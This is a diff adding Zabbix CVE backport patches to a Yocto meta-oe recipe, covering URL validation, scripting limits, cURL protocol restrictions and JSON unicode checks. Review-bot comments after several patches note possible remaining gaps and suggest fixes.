@@ -0,0 +1,53 @@ +From 7373f92c80eb89941428468cd6b9d5c8879a7f93 Mon Sep 17 00:00:00 2001 +From: Changqing Li <changqing.li@windriver.com> +Date: Wed, 4 Jan 2023 14:23:34 +0800 +Subject: [PATCH] [DEV-2283] added validation of the scheduled report + generation URL to zabbix-web-service + +Upstream-Status: Backport [https://git.zabbix.com/projects/ZBX/repos/zabbix/commits/fdb03971867] +CVE: CVE-2022-46768 + +Signed-off-by: Changqing Li <changqing.li@windriver.com> +--- + .../zabbix_web_service/pdf_report_creator.go | 18 ++++++++++++++++++ + 1 file changed, 18 insertions(+) + +diff --git a/src/go/cmd/zabbix_web_service/pdf_report_creator.go b/src/go/cmd/zabbix_web_service/pdf_report_creator.go +index 391b58b..8452a3d 100644 +--- a/src/go/cmd/zabbix_web_service/pdf_report_creator.go ++++ b/src/go/cmd/zabbix_web_service/pdf_report_creator.go +@@ -29,6 +29,7 @@ import ( + "net/http" + "net/url" + "strconv" ++ "strings" + "time" + + "github.com/chromedp/cdproto/emulation" +@@ -123,6 +124,23 @@ func (h *handler) report(w http.ResponseWriter, r *http.Request) { + return + } + ++ if u.Scheme != "http" && u.Scheme != "https" { ++ logAndWriteError(w, fmt.Sprintf("Unexpected URL scheme: \"%s\"", u.Scheme), http.StatusBadRequest) ++ return ++ } ++ ++ if !strings.HasSuffix(u.Path, "/zabbix.php") { ++ logAndWriteError(w, fmt.Sprintf("Unexpected URL path: \"%s\"", u.Path), http.StatusBadRequest) ++ return ++ } ++ ++ queryParams := u.Query() ++ ++ if queryParams.Get("action") != "dashboard.print" { ++ logAndWriteError(w, fmt.Sprintf("Unexpected URL action: \"%s\"", queryParams.Get("action")), http.StatusBadRequest) ++ return ++ } ++ + log.Tracef( + "making chrome headless request with parameters url: %s, width: %s, height: %s for report request from %s", + u.String(), req.Parameters["width"], req.Parameters["height"], r.RemoteAddr) +-- +2.25.1 + 
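Review bot: The new checks in report() validate the scheme, the path suffix and the `action` parameter but never look at `u.Host`. A URL on any host still passes if its path ends in `/zabbix.php` and it carries `action=dashboard.print`, and it is then handed to the headless browser. If the service has, or can be given, a configured frontend address, comparing `u.Host` against it here would close that gap; whether such a setting exists is not visible in this hunk. Separately, the error strings interpolate request-controlled values with `\"%s\"`; `%q`, as in `fmt.Sprintf("Unexpected URL path: %q", u.Path)`, would escape control characters before they reach the log. report() starts before and continues after the hunk.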
diff --git a/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-29449.patch b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-29449.patch new file mode 100644 index 0000000000..675d9e0f35 --- /dev/null +++ b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-29449.patch 
@@ -0,0 +1,247 @@ +From 240754ccee1b6b35ac47862be56dacec11e65b32 Mon Sep 17 00:00:00 2001 +From: Dmitrijs Goloscapovs <dmitrijs.goloscapovs@zabbix.com> +Date: Thu, 27 Jul 2023 11:23:54 +0000 +Subject: [PATCH] .......PS. [DEV-2387] added new limits for JS objects + +Merge in ZBX/zabbix from feature/DEV-2387-6.0 to release/6.0 + +* commit '16e5f15a70cfbf00c646cb92d1fcb8a362900285': + .......PS. [DEV-2387] removed logsize check based on json buffer + .......PS. [DEV-2387] removed logsize check based on json buffer + .......PS. [DEV-2387] fixed pr comments + .......PS. [DEV-2387] removed useless include + .......PS. [DEV-2387] added limits for logging and adding httprequest headers + .......PS. [DEV-2387] limited initialization of new HttpRequest objects + +CVE: CVE-2023-29449 + +Upstream-Status: Backport [https://git.zabbix.com/projects/ZBX/repos/zabbix/commits/240754ccee1] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + src/libs/zbxembed/console.c | 23 ++++++++++++----------- + src/libs/zbxembed/embed.c | 1 + + src/libs/zbxembed/embed.h | 3 +++ + src/libs/zbxembed/httprequest.c | 28 ++++++++++++++++++++++++++++ + src/libs/zbxembed/zabbix.c | 23 ++++++++++++----------- + 5 files changed, 56 insertions(+), 22 deletions(-) + +diff --git a/src/libs/zbxembed/console.c b/src/libs/zbxembed/console.c +index c733487..60c48fc 100644 +--- a/src/libs/zbxembed/console.c ++++ b/src/libs/zbxembed/console.c +@@ -90,27 +90,28 @@ static duk_ret_t es_log_message(duk_context *ctx, int level) + else + msg_output = zbx_strdup(msg_output, "undefined"); + +- zabbix_log(level, "%s", msg_output); +- + duk_get_memory_functions(ctx, &out_funcs); + env = (zbx_es_env_t *)out_funcs.udata; + +- if (NULL == env->json) +- goto out; +- +- if (ZBX_ES_LOG_MEMORY_LIMIT < env->json->buffer_size) /* approximate limit */ ++ if (ZBX_ES_LOG_MEMORY_LIMIT < env->log_size) + { + err_index = duk_push_error_object(ctx, DUK_RET_EVAL_ERROR, "log exceeds the maximum size of " + ZBX_FS_UI64 " 
bytes.", ZBX_ES_LOG_MEMORY_LIMIT); + goto out; + } + +- zbx_json_addobject(env->json, NULL); +- zbx_json_adduint64(env->json, "level", (zbx_uint64_t)level); +- zbx_json_adduint64(env->json, "ms", zbx_get_duration_ms(&env->start_time)); +- zbx_json_addstring(env->json, "message", msg_output, ZBX_JSON_TYPE_STRING); +- zbx_json_close(env->json); ++ zabbix_log(level, "%s", msg_output); ++ ++ if (NULL != env->json) ++ { ++ zbx_json_addobject(env->json, NULL); ++ zbx_json_adduint64(env->json, "level", (zbx_uint64_t)level); ++ zbx_json_adduint64(env->json, "ms", zbx_get_duration_ms(&env->start_time)); ++ zbx_json_addstring(env->json, "message", msg_output, ZBX_JSON_TYPE_STRING); ++ zbx_json_close(env->json); ++ } + out: ++ env->log_size += strlen(msg_output); + zbx_free(msg_output); + + if (-1 != err_index) +diff --git a/src/libs/zbxembed/embed.c b/src/libs/zbxembed/embed.c +index 34d8d18..cc80925 100644 +--- a/src/libs/zbxembed/embed.c ++++ b/src/libs/zbxembed/embed.c +@@ -444,6 +444,7 @@ int zbx_es_execute(zbx_es_t *es, const char *script, const char *code, int size, + zabbix_log(LOG_LEVEL_DEBUG, "In %s() param:%s", __func__, param); + + zbx_timespec(&es->env->start_time); ++ es->env->http_req_objects = 0; + + if (NULL != es->env->json) + { +diff --git a/src/libs/zbxembed/embed.h b/src/libs/zbxembed/embed.h +index a0a360c..2b954a8 100644 +--- a/src/libs/zbxembed/embed.h ++++ b/src/libs/zbxembed/embed.h +@@ -48,6 +48,9 @@ struct zbx_es_env + struct zbx_json *json; + + jmp_buf loc; ++ ++ int http_req_objects; ++ size_t log_size; + }; + + zbx_es_env_t *zbx_es_get_env(duk_context *ctx); +diff --git a/src/libs/zbxembed/httprequest.c b/src/libs/zbxembed/httprequest.c +index 8c2839c..7f0eed9 100644 +--- a/src/libs/zbxembed/httprequest.c ++++ b/src/libs/zbxembed/httprequest.c +@@ -52,6 +52,7 @@ typedef struct + size_t headers_in_alloc; + size_t headers_in_offset; + unsigned char custom_header; ++ size_t headers_sz; + } + zbx_es_httprequest_t; + +@@ -145,13 +146,21 @@ static 
duk_ret_t es_httprequest_dtor(duk_context *ctx) + ******************************************************************************/ + static duk_ret_t es_httprequest_ctor(duk_context *ctx) + { ++#define MAX_HTTPREQUEST_OBJECT_COUNT 10 + zbx_es_httprequest_t *request; + CURLcode err; ++ zbx_es_env_t *env; + int err_index = -1; + + if (!duk_is_constructor_call(ctx)) + return DUK_RET_TYPE_ERROR; + ++ if (NULL == (env = zbx_es_get_env(ctx))) ++ return duk_error(ctx, DUK_RET_TYPE_ERROR, "cannot access internal environment"); ++ ++ if (MAX_HTTPREQUEST_OBJECT_COUNT == env->http_req_objects) ++ return duk_error(ctx, DUK_RET_EVAL_ERROR, "maximum count of HttpRequest objects was reached"); ++ + duk_push_this(ctx); + + request = (zbx_es_httprequest_t *)zbx_malloc(NULL, sizeof(zbx_es_httprequest_t)); +@@ -189,7 +198,10 @@ out: + return duk_throw(ctx); + } + ++ env->http_req_objects++; ++ + return 0; ++#undef MAX_HTTPREQUEST_OBJECT_COUNT + } + + /****************************************************************************** +@@ -201,10 +213,12 @@ out: + ******************************************************************************/ + static duk_ret_t es_httprequest_add_header(duk_context *ctx) + { ++#define ZBX_ES_MAX_HEADERS_SIZE ZBX_KIBIBYTE * 128 + zbx_es_httprequest_t *request; + CURLcode err; + char *utf8 = NULL; + int err_index = -1; ++ size_t header_sz; + + if (NULL == (request = es_httprequest(ctx))) + return duk_error(ctx, DUK_RET_EVAL_ERROR, "internal scripting error: null object"); +@@ -215,9 +229,20 @@ static duk_ret_t es_httprequest_add_header(duk_context *ctx) + goto out; + } + ++ header_sz = strlen(utf8); ++ ++ if (ZBX_ES_MAX_HEADERS_SIZE < request->headers_sz + header_sz) ++ { ++ err_index = duk_push_error_object(ctx, DUK_RET_TYPE_ERROR, "headers exceeded maximum size of " ++ ZBX_FS_UI64 " bytes.", ZBX_ES_MAX_HEADERS_SIZE); ++ ++ goto out; ++ } ++ + request->headers = curl_slist_append(request->headers, utf8); + ZBX_CURL_SETOPT(ctx, request->handle, 
CURLOPT_HTTPHEADER, request->headers, err); + request->custom_header = 1; ++ request->headers_sz += header_sz + 1; + out: + zbx_free(utf8); + +@@ -225,6 +250,7 @@ out: + return duk_throw(ctx); + + return 0; ++#undef ZBX_ES_MAX_HEADERS_SIZE + } + + /****************************************************************************** +@@ -244,6 +270,7 @@ static duk_ret_t es_httprequest_clear_header(duk_context *ctx) + curl_slist_free_all(request->headers); + request->headers = NULL; + request->custom_header = 0; ++ request->headers_sz = 0; + + return 0; + } +@@ -311,6 +338,7 @@ static duk_ret_t es_httprequest_query(duk_context *ctx, const char *http_request + { + curl_slist_free_all(request->headers); + request->headers = NULL; ++ request->headers_sz = 0; + } + + if (NULL != contents) +diff --git a/src/libs/zbxembed/zabbix.c b/src/libs/zbxembed/zabbix.c +index 820768f..0ecde86 100644 +--- a/src/libs/zbxembed/zabbix.c ++++ b/src/libs/zbxembed/zabbix.c +@@ -81,27 +81,28 @@ static duk_ret_t es_zabbix_log(duk_context *ctx) + zbx_replace_invalid_utf8(message); + } + +- zabbix_log(level, "%s", message); +- + duk_get_memory_functions(ctx, &out_funcs); + env = (zbx_es_env_t *)out_funcs.udata; + +- if (NULL == env->json) +- goto out; +- +- if (ZBX_ES_LOG_MEMORY_LIMIT < env->json->buffer_size) /* approximate limit */ ++ if (ZBX_ES_LOG_MEMORY_LIMIT < env->log_size) + { + err_index = duk_push_error_object(ctx, DUK_RET_EVAL_ERROR, "log exceeds the maximum size of " + ZBX_FS_UI64 " bytes.", ZBX_ES_LOG_MEMORY_LIMIT); + goto out; + } + +- zbx_json_addobject(env->json, NULL); +- zbx_json_adduint64(env->json, "level", (zbx_uint64_t)level); +- zbx_json_adduint64(env->json, "ms", zbx_get_duration_ms(&env->start_time)); +- zbx_json_addstring(env->json, "message", message, ZBX_JSON_TYPE_STRING); +- zbx_json_close(env->json); ++ zabbix_log(level, "%s", message); ++ ++ if (NULL != env->json) ++ { ++ zbx_json_addobject(env->json, NULL); ++ zbx_json_adduint64(env->json, "level", 
(zbx_uint64_t)level); ++ zbx_json_adduint64(env->json, "ms", zbx_get_duration_ms(&env->start_time)); ++ zbx_json_addstring(env->json, "message", message, ZBX_JSON_TYPE_STRING); ++ zbx_json_close(env->json); ++ } + out: ++ env->log_size += strlen(message); + zbx_free(message); + + if (-1 != err_index) +-- +2.35.5 diff --git a/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-29450.patch b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-29450.patch new file mode 100644 index 0000000000..ea790f0a93 --- /dev/null +++ b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-29450.patch 
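Review bot: `env->log_size` is only ever incremented in the visible hunks. zbx_es_execute() resets `http_req_objects` to 0 at the start of each run but has no matching reset for the new `log_size` field. If the environment is reused across executions, as the per-run reset of the object counter suggests, the byte count would keep growing. Every later es_log_message() or es_zabbix_log() call would then fail with the size error. Adding `es->env->log_size = 0;` next to the `http_req_objects` reset would scope the limit to one execution; confirm against the rest of embed.c, which is outside the hunk.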
@@ -0,0 +1,241 @@ +From 76f6a80cb3d6131e9c3e98918305c1bf1805fa2a Mon Sep 17 00:00:00 2001 +From: Vladislavs Sokurenko <vladislavs.sokurenko@zabbix.com> +Date: Thu, 27 Jul 2023 12:43:02 +0000 +Subject: [PATCH] ...G...PS. [DEV-2429] fixed unauthorised file system access + when using cURL + +Merge in ZBX/zabbix from feature/DEV-2429-6.0 to release/6.0 + +* commit 'abf345230ee185d61cc0bd70d432fa4b093b8a53': + ...G...PS. [DEV-2429] fixed unautorized file system access when using curl + .......PS. [DEV-2429] fixed unautorized file system access in JS preprocessing + +CVE: CVE-2023-29450 + +Upstream-Status: Backport [https://git.zabbix.com/projects/ZBX/repos/zabbix/commits/76f6a80cb3d] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + src/libs/zbxembed/httprequest.c | 4 +++ + src/libs/zbxhistory/history_elastic.c | 30 ++++++++++++++++++++++ + src/libs/zbxhttp/http.c | 9 +++++++ + src/libs/zbxmedia/email.c | 6 +++++ + src/libs/zbxsysinfo/common/http.c | 9 +++++++ + src/libs/zbxsysinfo/simple/simple.c | 11 ++++++++ + src/zabbix_server/httppoller/httptest.c | 9 +++++++ + src/zabbix_server/reporter/report_writer.c | 10 ++++++++ + src/zabbix_server/vmware/vmware.c | 9 +++++++ + 9 files changed, 97 insertions(+) + +diff --git a/src/libs/zbxembed/httprequest.c b/src/libs/zbxembed/httprequest.c +index 7f0eed9..871b925 100644 +--- a/src/libs/zbxembed/httprequest.c ++++ b/src/libs/zbxembed/httprequest.c +@@ -354,6 +354,10 @@ static duk_ret_t es_httprequest_query(duk_context *ctx, const char *http_request + ZBX_CURL_SETOPT(ctx, request->handle, CURLOPT_CUSTOMREQUEST, http_request, err); + ZBX_CURL_SETOPT(ctx, request->handle, CURLOPT_TIMEOUT_MS, timeout_ms - elapsed_ms, err); + ZBX_CURL_SETOPT(ctx, request->handle, CURLOPT_POSTFIELDS, ZBX_NULL2EMPTY_STR(contents), err); ++#if LIBCURL_VERSION_NUM >= 0x071304 ++ /* CURLOPT_PROTOCOLS is supported starting with version 7.19.4 (0x071304) */ ++ ZBX_CURL_SETOPT(ctx, request->handle, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | 
CURLPROTO_HTTPS, err); ++#endif + + request->data_offset = 0; + request->headers_in_offset = 0; +diff --git a/src/libs/zbxhistory/history_elastic.c b/src/libs/zbxhistory/history_elastic.c +index 8b3ea84..fc881da 100644 +--- a/src/libs/zbxhistory/history_elastic.c ++++ b/src/libs/zbxhistory/history_elastic.c +@@ -406,6 +406,16 @@ static void elastic_writer_add_iface(zbx_history_iface_t *hist) + goto out; + } + ++#if LIBCURL_VERSION_NUM >= 0x071304 ++ /* CURLOPT_PROTOCOLS is supported starting with version 7.19.4 (0x071304) */ ++ if (CURLE_OK != (err = curl_easy_setopt(data->handle, opt = CURLOPT_PROTOCOLS, ++ CURLPROTO_HTTP | CURLPROTO_HTTPS))) ++ { ++ zabbix_log(LOG_LEVEL_ERR, "cannot set cURL option %d: [%s]", (int)opt, curl_easy_strerror(err)); ++ goto out; ++ } ++#endif ++ + *page_w[hist->value_type].errbuf = '\0'; + + if (CURLE_OK != (err = curl_easy_setopt(data->handle, opt = CURLOPT_PRIVATE, &page_w[hist->value_type]))) +@@ -722,6 +732,16 @@ static int elastic_get_values(zbx_history_iface_t *hist, zbx_uint64_t itemid, in + goto out; + } + ++#if LIBCURL_VERSION_NUM >= 0x071304 ++ /* CURLOPT_PROTOCOLS is supported starting with version 7.19.4 (0x071304) */ ++ if (CURLE_OK != (err = curl_easy_setopt(data->handle, opt = CURLOPT_PROTOCOLS, ++ CURLPROTO_HTTP | CURLPROTO_HTTPS))) ++ { ++ zabbix_log(LOG_LEVEL_ERR, "cannot set cURL option %d: [%s]", (int)opt, curl_easy_strerror(err)); ++ goto out; ++ } ++#endif ++ + zabbix_log(LOG_LEVEL_DEBUG, "sending query to %s; post data: %s", data->post_url, query.buffer); + + page_r.offset = 0; +@@ -1065,6 +1085,16 @@ void zbx_elastic_version_extract(struct zbx_json *json) + goto clean; + } + ++#if LIBCURL_VERSION_NUM >= 0x071304 ++ /* CURLOPT_PROTOCOLS is supported starting with version 7.19.4 (0x071304) */ ++ if (CURLE_OK != (err = curl_easy_setopt(handle, opt = CURLOPT_PROTOCOLS, ++ CURLPROTO_HTTP | CURLPROTO_HTTPS))) ++ { ++ zabbix_log(LOG_LEVEL_WARNING, "cannot set cURL option %d: [%s]", (int)opt, curl_easy_strerror(err)); 
++ goto clean; ++ } ++#endif ++ + *errbuf = '\0'; + + if (CURLE_OK != (err = curl_easy_perform(handle))) +diff --git a/src/libs/zbxhttp/http.c b/src/libs/zbxhttp/http.c +index c10922c..36774cc 100644 +--- a/src/libs/zbxhttp/http.c ++++ b/src/libs/zbxhttp/http.c +@@ -333,6 +333,15 @@ int zbx_http_get(const char *url, const char *header, long timeout, char **out, + goto clean; + } + ++#if LIBCURL_VERSION_NUM >= 0x071304 ++ /* CURLOPT_PROTOCOLS is supported starting with version 7.19.4 (0x071304) */ ++ if (CURLE_OK != (err = curl_easy_setopt(easyhandle, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS))) ++ { ++ *error = zbx_dsprintf(NULL, "Cannot set allowed protocols: %s", curl_easy_strerror(err)); ++ goto clean; ++ } ++#endif ++ + if (CURLE_OK != (err = curl_easy_setopt(easyhandle, CURLOPT_URL, url))) + { + *error = zbx_dsprintf(NULL, "Cannot specify URL: %s", curl_easy_strerror(err)); +diff --git a/src/libs/zbxmedia/email.c b/src/libs/zbxmedia/email.c +index 3b987d9..d3af744 100644 +--- a/src/libs/zbxmedia/email.c ++++ b/src/libs/zbxmedia/email.c +@@ -661,6 +661,12 @@ static int send_email_curl(const char *smtp_server, unsigned short smtp_port, co + if ('\0' != *smtp_helo) + zbx_snprintf(url + url_offset, sizeof(url) - url_offset, "/%s", smtp_helo); + ++#if LIBCURL_VERSION_NUM >= 0x071304 ++ /* CURLOPT_PROTOCOLS is supported starting with version 7.19.4 (0x071304) */ ++ if (CURLE_OK != (err = curl_easy_setopt(easyhandle, CURLOPT_PROTOCOLS, CURLPROTO_SMTPS | CURLPROTO_SMTP))) ++ goto error; ++#endif ++ + if (CURLE_OK != (err = curl_easy_setopt(easyhandle, CURLOPT_URL, url))) + goto error; + +diff --git a/src/libs/zbxsysinfo/common/http.c b/src/libs/zbxsysinfo/common/http.c +index acd77e1..8dc4793 100644 +--- a/src/libs/zbxsysinfo/common/http.c ++++ b/src/libs/zbxsysinfo/common/http.c +@@ -176,6 +176,15 @@ static int curl_page_get(char *url, char **buffer, char **error) + goto out; + } + ++#if LIBCURL_VERSION_NUM >= 0x071304 ++ /* CURLOPT_PROTOCOLS is supported 
starting with version 7.19.4 (0x071304) */ ++ if (CURLE_OK != (err = curl_easy_setopt(easyhandle, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS))) ++ { ++ *error = zbx_dsprintf(*error, "Cannot set allowed protocols: %s", curl_easy_strerror(err)); ++ goto out; ++ } ++#endif ++ + if (CURLE_OK == (err = curl_easy_perform(easyhandle))) + { + if (NULL != buffer) +diff --git a/src/libs/zbxsysinfo/simple/simple.c b/src/libs/zbxsysinfo/simple/simple.c +index be1b9f9..80c5eac 100644 +--- a/src/libs/zbxsysinfo/simple/simple.c ++++ b/src/libs/zbxsysinfo/simple/simple.c +@@ -189,6 +189,17 @@ static int check_https(const char *host, unsigned short port, int timeout, int * + goto clean; + } + ++#if LIBCURL_VERSION_NUM >= 0x071304 ++ /* CURLOPT_PROTOCOLS is supported starting with version 7.19.4 (0x071304) */ ++ if (CURLE_OK != (err = curl_easy_setopt(easyhandle, opt = CURLOPT_PROTOCOLS, ++ CURLPROTO_HTTP | CURLPROTO_HTTPS))) ++ { ++ zabbix_log(LOG_LEVEL_DEBUG, "%s: could not set cURL option [%d]: %s", ++ __func__, (int)opt, curl_easy_strerror(err)); ++ goto clean; ++ } ++#endif ++ + if (NULL != CONFIG_SOURCE_IP) + { + if (CURLE_OK != (err = curl_easy_setopt(easyhandle, opt = CURLOPT_INTERFACE, CONFIG_SOURCE_IP))) +diff --git a/src/zabbix_server/httppoller/httptest.c b/src/zabbix_server/httppoller/httptest.c +index 0ff70ef..0201442 100644 +--- a/src/zabbix_server/httppoller/httptest.c ++++ b/src/zabbix_server/httppoller/httptest.c +@@ -696,6 +696,15 @@ static void process_httptest(DC_HOST *host, zbx_httptest_t *httptest) + goto clean; + } + ++#if LIBCURL_VERSION_NUM >= 0x071304 ++ /* CURLOPT_PROTOCOLS is supported starting with version 7.19.4 (0x071304) */ ++ if (CURLE_OK != (err = curl_easy_setopt(easyhandle, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS))) ++ { ++ err_str = zbx_strdup(err_str, curl_easy_strerror(err)); ++ goto clean; ++ } ++#endif ++ + if (SUCCEED != zbx_http_prepare_ssl(easyhandle, httptest->httptest.ssl_cert_file, + 
httptest->httptest.ssl_key_file, httptest->httptest.ssl_key_password, + httptest->httptest.verify_peer, httptest->httptest.verify_host, &err_str)) +diff --git a/src/zabbix_server/reporter/report_writer.c b/src/zabbix_server/reporter/report_writer.c +index 87d1364..7530ed0 100644 +--- a/src/zabbix_server/reporter/report_writer.c ++++ b/src/zabbix_server/reporter/report_writer.c +@@ -162,6 +162,16 @@ static int rw_get_report(const char *url, const char *cookie, int width, int hei + goto out; + } + ++#if LIBCURL_VERSION_NUM >= 0x071304 ++ /* CURLOPT_PROTOCOLS is supported starting with version 7.19.4 (0x071304) */ ++ if (CURLE_OK != (err = curl_easy_setopt(curl, opt = CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS))) ++ { ++ *error = zbx_dsprintf(*error, "Cannot set cURL option %d: %s.", (int)opt, ++ (curl_error = rw_curl_error(err))); ++ goto out; ++ } ++#endif ++ + if (NULL != CONFIG_TLS_CA_FILE && '\0' != *CONFIG_TLS_CA_FILE) + { + if (CURLE_OK != (err = curl_easy_setopt(curl, opt = CURLOPT_CAINFO, CONFIG_TLS_CA_FILE)) || +diff --git a/src/zabbix_server/vmware/vmware.c b/src/zabbix_server/vmware/vmware.c +index b02c8c7..718d519 100644 +--- a/src/zabbix_server/vmware/vmware.c ++++ b/src/zabbix_server/vmware/vmware.c +@@ -2045,6 +2045,15 @@ static int vmware_service_authenticate(zbx_vmware_service_t *service, CURL *easy + goto out; + } + ++#if LIBCURL_VERSION_NUM >= 0x071304 ++ /* CURLOPT_PROTOCOLS is supported starting with version 7.19.4 (0x071304) */ ++ if (CURLE_OK != (err = curl_easy_setopt(easyhandle, opt = CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS))) ++ { ++ *error = zbx_dsprintf(*error, "Cannot set cURL option %d: %s.", (int)opt, curl_easy_strerror(err)); ++ goto out; ++ } ++#endif ++ + if (NULL != CONFIG_SOURCE_IP) + { + if (CURLE_OK != (err = curl_easy_setopt(easyhandle, opt = CURLOPT_INTERFACE, CONFIG_SOURCE_IP))) +-- +2.35.5 
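Review bot: Each added block restricts `CURLOPT_PROTOCOLS` but none sets `CURLOPT_REDIR_PROTOCOLS`. On handles that follow redirects, the schemes a redirect may switch to therefore stay at libcurl's default rather than the HTTP/HTTPS (or SMTP/SMTPS) mask chosen here. Where `CURLOPT_FOLLOWLOCATION` is enabled, which these hunks do not show, setting `CURLOPT_REDIR_PROTOCOLS` to the same mask right after the added call would make the restriction hold across redirects. The same guarded block is repeated across nine files, so a small shared helper would keep the mask and the version guard in one place. All of the touched functions start and end outside their hunks.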
diff --git a/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-29451.patch b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-29451.patch new file mode 100644 index 0000000000..453f67a920 --- /dev/null +++ b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-29451.patch 
@@ -0,0 +1,116 @@ +From 90274a56b2505997cd1677f0bd6a8b89b21df163 Mon Sep 17 00:00:00 2001 +From: Changqing Li <changqing.li@windriver.com> +Date: Wed, 26 Apr 2023 15:00:07 +0800 +Subject: [PATCH] Fix CVE-2023-29451 + +.......PS. [DEV-2450] fixed JSON validation not detecting invalid unicode characters and out of bounds access with JSONPath on invalid unicode character + +Merge in ZBX/zabbix from feature/DEV-2450-6.0 to release/6.0 + +* commit '97efb4ed5069d4febe825671e2c3d106478d082d': + .......PS. [DEV-2450] added mock test + .......PS. [DEV-2450] fixed JSON validation not detecting invalid unicode characters and out of bounds access with JSONPath on invalid unicode character + .......PS. [DEV-2450] fixed JSON validation not detecting invalid unicode characters and out of bounds access with JSONPath on invalid unicode character + +Upstream-Status: Backport +[https://git.zabbix.com/projects/ZBX/repos/zabbix/commits/3b6a8c84612a67daaf89879226349420104bff24] +CVE: CVE-2023-29451 + +Signed-off-by: Changqing Li <changqing.li@windriver.com> +--- + src/libs/zbxdiag/diag.c | 3 ++- + src/libs/zbxjson/json.c | 2 +- + src/libs/zbxjson/json.h | 1 + + src/libs/zbxjson/json_parser.c | 15 +++++---------- + src/zabbix_server/reporter/report_protocol.c | 3 ++- + 5 files changed, 11 insertions(+), 13 deletions(-) + +diff --git a/src/libs/zbxdiag/diag.c b/src/libs/zbxdiag/diag.c +index 6fc5509..dc47407 100644 +--- a/src/libs/zbxdiag/diag.c ++++ b/src/libs/zbxdiag/diag.c +@@ -673,7 +673,8 @@ static void diag_get_simple_values(const struct zbx_json_parse *jp, char **msg) + { + if (FAIL == zbx_json_brackets_open(pnext, &jp_value)) + { +- zbx_json_decodevalue_dyn(pnext, &value, &value_alloc, &type); ++ if (NULL == zbx_json_decodevalue_dyn(pnext, &value, &value_alloc, &type)) ++ type = ZBX_JSON_TYPE_NULL; + + if (0 != msg_offset) + zbx_chrcpy_alloc(msg, &msg_alloc, &msg_offset, ' '); +diff --git a/src/libs/zbxjson/json.c b/src/libs/zbxjson/json.c +index 4161ef0..c043d7e 100644 +--- 
a/src/libs/zbxjson/json.c ++++ b/src/libs/zbxjson/json.c +@@ -764,7 +764,7 @@ static unsigned int zbx_hex2num(char c) + * 0 on error (invalid escape sequence) * + * * + ******************************************************************************/ +-static unsigned int zbx_json_decode_character(const char **p, unsigned char *bytes) ++unsigned int zbx_json_decode_character(const char **p, unsigned char *bytes) + { + bytes[0] = '\0'; + +diff --git a/src/libs/zbxjson/json.h b/src/libs/zbxjson/json.h +index c59646a..4008411 100644 +--- a/src/libs/zbxjson/json.h ++++ b/src/libs/zbxjson/json.h +@@ -29,5 +29,6 @@ + SKIP_WHITESPACE(src) + + void zbx_set_json_strerror(const char *fmt, ...) __zbx_attr_format_printf(1, 2); ++unsigned int zbx_json_decode_character(const char **p, unsigned char *bytes); + + #endif +diff --git a/src/libs/zbxjson/json_parser.c b/src/libs/zbxjson/json_parser.c +index c8dcee4..64d24cf 100644 +--- a/src/libs/zbxjson/json_parser.c ++++ b/src/libs/zbxjson/json_parser.c +@@ -88,7 +88,7 @@ static zbx_int64_t json_parse_string(const char *start, char **error) + if ('\\' == *ptr) + { + const char *escape_start = ptr; +- int i; ++ unsigned char uc[4]; /* decoded Unicode character takes 1-4 bytes in UTF-8 */ + + /* unexpected end of string data, failing */ + if ('\0' == *(++ptr)) +@@ -107,16 +107,11 @@ static zbx_int64_t json_parse_string(const char *start, char **error) + break; + case 'u': + /* check if the \u is followed with 4 hex digits */ +- for (i = 0; i < 4; i++) +- { +- if (0 == isxdigit((unsigned char)*(++ptr))) +- { +- return json_error("invalid escape sequence in string", +- escape_start, error); +- } ++ if (0 == zbx_json_decode_character(&ptr, uc)) { ++ return json_error("invalid escape sequence in string", ++ escape_start, error); + } +- +- break; ++ continue; + default: + return json_error("invalid escape sequence in string data", + escape_start, error); +diff --git a/src/zabbix_server/reporter/report_protocol.c 
b/src/zabbix_server/reporter/report_protocol.c +index 5f55f51..ee0e02e 100644 +--- a/src/zabbix_server/reporter/report_protocol.c ++++ b/src/zabbix_server/reporter/report_protocol.c +@@ -421,7 +421,8 @@ void zbx_report_test(const struct zbx_json_parse *jp, zbx_uint64_t userid, struc + size_t value_alloc = 0; + zbx_ptr_pair_t pair; + +- zbx_json_decodevalue_dyn(pnext, &value, &value_alloc, NULL); ++ if (NULL == zbx_json_decodevalue_dyn(pnext, &value, &value_alloc, NULL)) ++ continue; + pair.first = zbx_strdup(NULL, key); + pair.second = value; + zbx_vector_ptr_pair_append(¶ms, pair); +-- +2.25.1 + diff --git a/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-32726.patch b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-32726.patch new file mode 100644 index 0000000000..b9c37bc045 --- /dev/null +++ b/meta-oe/recipes-connectivity/zabbix/zabbix/CVE-2023-32726.patch 
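Review bot: In the report_protocol.c hunk of the added CVE-2023-29451.patch, a parameter whose value fails to decode is dropped by the new `continue` without any trace. The test report then proceeds with a reduced parameter set, and nothing in the log or the response says why. A log line before the `continue` would make rejected input visible to operators, for example `zabbix_log(LOG_LEVEL_DEBUG, "cannot decode value of report parameter \"%s\"", key);`. The body of zbx_report_test continues outside the hunk, so it is worth confirming that `value` holds no allocation from a failed decode when the loop moves on.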
